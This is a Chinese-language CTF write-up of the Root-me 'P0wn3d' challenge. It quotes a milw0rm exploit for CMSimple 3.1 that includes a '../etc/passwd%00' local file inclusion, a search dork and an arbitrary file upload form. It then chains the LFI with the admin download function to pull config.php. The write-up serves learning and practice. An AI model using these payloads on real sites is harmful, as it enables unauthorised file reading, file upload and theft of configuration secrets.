P0wn3d - Root-me

文章目录

  • 前言
  • 一、P0wn3d
  • 二、信息收集
  • 三.代码审计&漏洞利用
    • 代码审计
    • 漏洞利用
  • 总结


前言

提示:本人只是网络安全爱好者,并非专业人士,文中可能会出现表达错误或者其他问题,还望各位理解。

一、P0wn3d

在这里插入图片描述

二、信息收集

根据题目描述和源码的分析我们可以发现这是CMSimple 3.0版本。
通过Google搜索CMS漏洞,发现该CMS存在LFI。
可以在exploit-db下载到漏洞利用代码,但是目标机器是不允许写入文件或者说不允许上传文件。

<pre>
#
# CMSimple 3.1 Local File Inclusion / Arbitrary File Upload
# download: http://www.cmsimple.org/?Downloads
# dork: "Powered by CMSimple"
#
# author: irk4z@yahoo.pl
# homepage: http://irk4z.wordpress.com
#Local File Inclusion :http://[host]/[path]/index.php?sl=[file]%00http://[host]/[path]/index.php?sl=../../../../../../../etc/passwd%00Arbitrary File Upload (into http://[host]/[path]/downloads/ ):
pre>
<form method="POST" enctype="multipart/form-data" action="http://[host]/[path]/index.php?sl=../adm&adm=1" >
<input type="file" class="file" name="downloads" size="30">
<input type="hidden" name="action" value="upload">
<input type="hidden" name="function" value="downloads">
<input type="submit" class="submit" value="Upload">
form># milw0rm.com [2008-05-31]

以上exploit来自CMSimple 3.1 - Local File Inclusion / Arbitrary File Upload

三.代码审计&漏洞利用

代码审计

在本机搭建环境进行测试的时候,可以发现后台有个功能可以下载文件:
在这里插入图片描述
转到源代码看一下,试试能不能读取其他文件例如Config.php啥的。
在这里插入图片描述

在这里插入图片描述

漏洞利用

通过前面搜集到的LFI漏洞再配合我们找到的文件下载的接口,尝试构造一下链接,测试一下,看看我们的理论能不能成立。

http://xxxx.xxx/index.php?sl=../adm&adm=1&file=config&action=download

成功下载config.php文件
在这里插入图片描述

总结

本人第一次写文章,可能表达的不是很清楚,但还是希望能帮助到一些朋友,顺便记录下我的网络安全之路


本文来自互联网用户投稿,文章观点仅代表作者本人,不代表本站立场,不承担相关法律责任。如若转载,请注明出处。 如若内容造成侵权/违法违规/事实不符,请点击【内容举报】进行投诉反馈!

相关文章

立即
投稿

微信公众账号

微信扫一扫加关注

返回
顶部